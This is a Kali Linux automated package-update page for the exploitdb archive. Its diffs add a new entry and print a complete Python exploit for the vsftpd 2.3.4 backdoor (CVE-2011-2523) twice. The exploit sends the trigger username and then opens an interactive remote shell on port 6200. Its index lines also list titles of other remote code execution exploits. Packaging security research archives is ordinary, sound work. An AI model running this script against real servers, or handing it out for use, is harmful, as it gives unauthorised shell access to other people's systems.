Run of fresh-releases for exploitdb

Try this locally package):

debcheckout exploitdb
cd exploitdb
new-upstream --debian-revision=0kali1

Summary

new-upstream --debian-revision=0kali1

Diff

Branch: pristine-tar

diff --git a/exploitdb_20210413.orig.tar.gz.delta b/exploitdb_20210413.orig.tar.gz.delta
new file mode 100644
index 000000000..6c1fe331d
Binary files /dev/null and b/exploitdb_20210413.orig.tar.gz.delta differ
diff --git a/exploitdb_20210413.orig.tar.gz.id b/exploitdb_20210413.orig.tar.gz.id
new file mode 100644
index 000000000..5c9a1ef8c
--- /dev/null
+++ b/exploitdb_20210413.orig.tar.gz.id
@@ -0,0 +1 @@
+e75c640fa62e9e5499cb42384f8111e03ad427f8

Branch: upstream

Tag: upstream/20210413
diff --git a/exploits/unix/remote/49757.py b/exploits/unix/remote/49757.py
new file mode 100755
index 000000000..e8b888c5e
--- /dev/null
+++ b/exploits/unix/remote/49757.py
@@ -0,0 +1,40 @@
+# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
+# Date: 9-04-2021
+# Exploit Author: HerculesRD
+# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
+# Version: vsftpd 2.3.4
+# Tested on: debian
+# CVE : CVE-2011-2523
+
+#!/usr/bin/python3   
+                                                           
+from telnetlib import Telnet 
+import argparse
+from signal import signal, SIGINT
+from sys import exit
+
+def handler(signal_received, frame):
+    # Handle any cleanup here
+    print('   [+]Exiting...')
+    exit(0)
+
+signal(SIGINT, handler)                           
+parser=argparse.ArgumentParser()        
+parser.add_argument("host", help="input the address of the vulnerable host", type=str)
+args = parser.parse_args()       
+host = args.host                        
+portFTP = 21 #if necessary edit this line
+
+user="USER nergal:)"
+password="PASS pass"
+
+tn=Telnet(host, portFTP)
+tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
+tn.write(user.encode('ascii') + b"\n")
+tn.read_until(b"password.") #if necessary, edit this line
+tn.write(password.encode('ascii') + b"\n")
+
+tn2=Telnet(host, 6200)
+print('Success, shell opened')
+print('Send `exit` to quit shell')
+tn2.interact()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 175338e5b..4dddecebe 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18439,6 +18439,7 @@ id,file,description,date,author,type,platform,port
 49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple,
 49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple,
 49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",2021-04-08,"Google Security Research",remote,linux,
+49757,exploits/unix/remote/49757.py,"vsftpd 2.3.4 - Backdoor Command Execution",2021-04-12,HerculesRD,remote,unix,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,

Branch: main

diff --git a/debian/changelog b/debian/changelog
index 991a2b841..e099c8bdd 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,3 +1,9 @@
+exploitdb (20210413-0kali1) UNRELEASED; urgency=low
+
+  * New upstream release.
+
+ -- Kali Janitor <janitor@kali.org>  Tue, 13 Apr 2021 12:28:25 -0000
+
 exploitdb (20210410-0kali1) kali-dev; urgency=medium
 
   * Upstream update
diff --git a/exploits/unix/remote/49757.py b/exploits/unix/remote/49757.py
new file mode 100755
index 000000000..e8b888c5e
--- /dev/null
+++ b/exploits/unix/remote/49757.py
@@ -0,0 +1,40 @@
+# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
+# Date: 9-04-2021
+# Exploit Author: HerculesRD
+# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
+# Version: vsftpd 2.3.4
+# Tested on: debian
+# CVE : CVE-2011-2523
+
+#!/usr/bin/python3   
+                                                           
+from telnetlib import Telnet 
+import argparse
+from signal import signal, SIGINT
+from sys import exit
+
+def handler(signal_received, frame):
+    # Handle any cleanup here
+    print('   [+]Exiting...')
+    exit(0)
+
+signal(SIGINT, handler)                           
+parser=argparse.ArgumentParser()        
+parser.add_argument("host", help="input the address of the vulnerable host", type=str)
+args = parser.parse_args()       
+host = args.host                        
+portFTP = 21 #if necessary edit this line
+
+user="USER nergal:)"
+password="PASS pass"
+
+tn=Telnet(host, portFTP)
+tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
+tn.write(user.encode('ascii') + b"\n")
+tn.read_until(b"password.") #if necessary, edit this line
+tn.write(password.encode('ascii') + b"\n")
+
+tn2=Telnet(host, 6200)
+print('Success, shell opened')
+print('Send `exit` to quit shell')
+tn2.interact()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 175338e5b..4dddecebe 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18439,6 +18439,7 @@ id,file,description,date,author,type,platform,port
 49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple,
 49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple,
 49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",2021-04-08,"Google Security Research",remote,linux,
+49757,exploits/unix/remote/49757.py,"vsftpd 2.3.4 - Backdoor Command Execution",2021-04-12,HerculesRD,remote,unix,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,

Publish History

Resulting package

The resulting binary packages can be installed (if you have the apt repository enabled) by running one of:

apt install -t kali-experimental exploitdb

Full worker log Full build log